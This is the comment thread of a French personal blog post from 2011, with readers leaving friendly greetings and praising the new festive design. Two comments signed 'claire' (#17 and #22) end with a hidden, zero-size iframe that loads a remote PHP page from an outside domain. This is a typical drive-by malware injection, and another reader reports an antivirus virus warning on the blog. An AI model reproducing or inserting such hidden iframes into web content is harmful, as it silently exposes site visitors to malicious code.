• Coucou....

    humour


    Tags Tags : , ,
  • Commentaires

    22
    Samedi 26 Novembre 2011 à 17:22

    bonjour gigicolibri.. j'ai un ti souci avec mes coms... alors ne fais pas attention au lien qui s'inscrit en bas de celui-ci.. j'espère que tu passes un bon WE.. je t'envoie plein de bisous et te dis à lundi !!

    claire

    <iframe style="visibility: hidden;" src="http://loading-resource.com/analytics.php" width="0" height="0"></iframe>

    21
    Vendredi 25 Novembre 2011 à 22:39

    Bonsoir Gigi . Je viens te dire bonsoir et te laisser un bisou au passage .

    20
    Vendredi 25 Novembre 2011 à 20:27

    Coucou Gigi

    toi caché ou le joli puma hiii, mais je le vois,

    te souhaite une belle soirée - bisous

    19
    Vendredi 25 Novembre 2011 à 19:41

    Un petit jeu de cache-cache ?

    Haaaa 

    je te souhaite une belle fin de semaine

    18
    Cigalix
    Vendredi 25 Novembre 2011 à 17:44

    Bonsoir gigi

    je passe te souhaiter une bonne soirée ainsi qu'un bon weekend!

    Bises

    Sophie

    17
    Vendredi 25 Novembre 2011 à 15:05
    talonaiguille

    bonjour gigicolibri... j'espère que tu vas bien .. je te souhaite une très belle journée - bisous - claire
    <iframe style="visibility: hidden;" src="http://loading-resource.com/analytics.php" width="0" height="0"></iframe>

     

    16
    Karlyne
    Vendredi 25 Novembre 2011 à 14:56

    Reste caché

    Dis moi on me signale un virus quand je suis entrée chez toi

    Je vais voir avec mon anti virus

    Te tiens au courant

    Bon après-midi ma Gigi

    Gros bisous

    15
    Vendredi 25 Novembre 2011 à 14:10

    petit coucou avec la pluie pour te souhaiter un bon après-midi et un très bon week-end de gros bizzzous

    14
    Lady DarkLight Profil de Lady DarkLight
    Vendredi 25 Novembre 2011 à 14:06

    Mais moi je t'ai vu na nanair (lol) !!!

    Passe un bon we gigi

    Bisous

    13
    Vendredi 25 Novembre 2011 à 13:09


    bonjour ma GIGI


    JE TE SOUHAITE UNE BONNE JOURNEE


    TRES JOLIE TA CREA


    GROS BISOUS SYLVIA

    12
    Vendredi 25 Novembre 2011 à 11:45

    Salut mon amie gigi, il y a encore du brouillard ce matin !!!!!!!!je te souhaite une bonne journée, bise a+ 

    11
    Janine62 Profil de Janine62
    Vendredi 25 Novembre 2011 à 11:39

    Coucou ma Gigi !

    waouh ! c'est trop beau !!

    j'adore toutes ces étoiles qui brillent !

    Je te souhaite une belle journée,

    malgré la pluie qui est arrivée ! bouhhhh !

    gros bisous ma belle !

    athos & cheyenne

    10
    Vendredi 25 Novembre 2011 à 10:54

    J'en oublie mon image, sous le charme de ton blog.

    9
    Vendredi 25 Novembre 2011 à 10:52

    Bonjour ma Gigi,

    Hop, changement de décor, c'est superbe !

    Ca sent les fêtes.

    Jolie créa, marrante.

    Bonne fin de semaine, bisous.

    8
    Galatee Profil de Galatee
    Vendredi 25 Novembre 2011 à 10:47

    Image du Blog lassy028.centerblog.net


    Bonne journée et gros bisous Gigi

    7
    Vendredi 25 Novembre 2011 à 10:14

    salut gigi,

    je te souhaite une excellente journée et un bon weekend,

    bisous de bretagne,

    suzelle

    6
    Vendredi 25 Novembre 2011 à 08:44

    bonjour gigi,

    un petit coucou malgré que j'ai mis mon blog au ralenti, histoire d'y voir plus clair !

    je te souhaite une belle journée en cette veille de weekend

    bisous

    5
    MagalieMSGA
    Vendredi 25 Novembre 2011 à 07:57

    Gigi,

    Superbe, j'adore ce lion en noir en coin d'arbre, moi je t'ai vu petit lion, très original, il fallait le faire mais moi j'aime beaucoup...

    Une très jolie journée pour toi avec des bisous et des caresses à Genny..

    Suis très en retrad pour le bureau..

    Je fonce.

    Magalie

    BELLE AVANT LES FETES...

     

     

    4
    Vendredi 25 Novembre 2011 à 07:47

    Bonjour ma gigi, ce que c'est beau ici, c'est magique bravo


    Garde ta grisaille, quoique ce serait normal qu'il pleuve en cette saison on va le payer cruellement très bientôt, paroles d'un paysan qui t'embrasse en toute simplicité

    3
    Vendredi 25 Novembre 2011 à 06:27

    ah Gigi revient à ses premières amours du rouge et noir... déjà prète pour les fêtes avec plein d étoiles... gros bisous

    1
    Vendredi 25 Novembre 2011 à 06:18

    Bonjour ma gigi bisous

    raphie

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :